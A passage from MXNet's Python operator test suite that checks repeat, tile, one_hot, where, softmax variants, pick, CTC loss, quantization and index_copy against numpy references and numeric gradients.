exe = res._bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
expected_output = input_np.astype(np.float32)
check_amp_multicast(input_np, expected_output)
def test_all_finite():
data = mx.sym.Variable("data", dtype=np.float32)
data2 = mx.sym.Variable("data2", dtype=np.float32)
finite_arr = mx.nd.array([[0, 0]])
inf_arr = mx.nd.array([[np.inf, np.inf]])
z = mx.sym.all_finite(data)
ctx = default_context()
exe = z._bind(ctx, {'data': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
exe = z._bind(ctx, {'data': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z._bind(ctx, {'data': finite_arr, 'data2': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z._bind(ctx, {'data': finite_arr, 'data2': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_context())
bb = mx.nd.repeat(b, repeats)
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis)
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test._bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for i in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for i in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
with mx.np_shape():
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test._bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
with mx.np_shape():
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
with mx.np_shape():
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32
).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth,))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
with mx.np_shape():
test_empty_indices()
test_zero_depth()
def test_where():
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym._simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx.astype('float32'))
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym._simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx.astype('float32'))
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
assert(expect_out.all() == out.all())
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)], rtol=1e-3, atol=1e-4)
check_numeric_gradient(sym, [data], rtol=1e-1, atol=1e-2)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1._bind(default_context(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
assert_almost_equal(ndarr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
@with_environment('MXNET_SAFE_ACCUMULATION', '1')
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
assert_almost_equal(dtype_softmax, ref_softmax, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
assert_almost_equal(dtype_input.grad, ref_input.grad, rtol=grad_rtol, atol=grad_atol)
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
def test_softmax_with_length():
def np_softmax_with_length(data, length):
res = np.zeros(data.shape)
for i in range(length.shape[0]):
for j in range(length.shape[1]):
leng = int(length[i, j])
res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
return res
ndim = 3
shape = rand_shape_nd(ndim, dim=10)
len_shape = list(shape)
del len_shape[1]
len_shape = tuple(len_shape)
for dtype in [np.float16, np.float32, np.float64]:
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_length = np.random.randint(1, shape[1] + 1, len_shape)
mx_length = mx.nd.array(np_length, dtype=np.int32)
np_out = np_softmax_with_length(np_data, np_length)
data = mx.sym.Variable("data")
length = mx.sym.Variable("length")
mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
location = {"data": mx_data, "length": mx_length}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
[np.zeros(shape), np.zeros(len_shape, dtype=np.int32)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3, dtype="asnumpy")
def test_pick():
def test_pick_helper(index_type=np.int32):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
expected = data[exp]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth, contrib=False):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
if contrib:
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
else:
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc._bind(ctx=default_context(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
outTest = exe.outputs[0].copy()
# test forward without grad calc
exe.forward(is_train=False)
outTrain = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTest, outTrain)
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest, loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
def test_ctc_loss():
# Test 1: check that batches are same + check against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts, labels, true_loss, contrib=contrib)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels2, true_loss, contrib=contrib)
# Test 3: check use integer type as label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels3, true_loss, contrib=contrib)
def test_ctc_loss_with_large_classes():
ctx = default_context()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
for i in range(seq_len * batch_size) :
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss, expected_loss)
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label, contrib=False): # from tf
vocab_size = 5
max_label_len = 5
padding_mask = -1+ (blank_label=='first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
if contrib:
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
else:
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l, loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad, grad_truth, atol=1e-5, rtol=1e-5)
for contrib in [False, True]:
for label in ['first', 'last']:
check_ctc_loss_grad(label, contrib=contrib)
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
print(a_.asnumpy())
print(a_real.asnumpy())
assert same(qa.asnumpy(), qa_real.asnumpy())
assert_almost_equal(a_.asnumpy(), a_real.asnumpy(), rtol=1e-2)
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
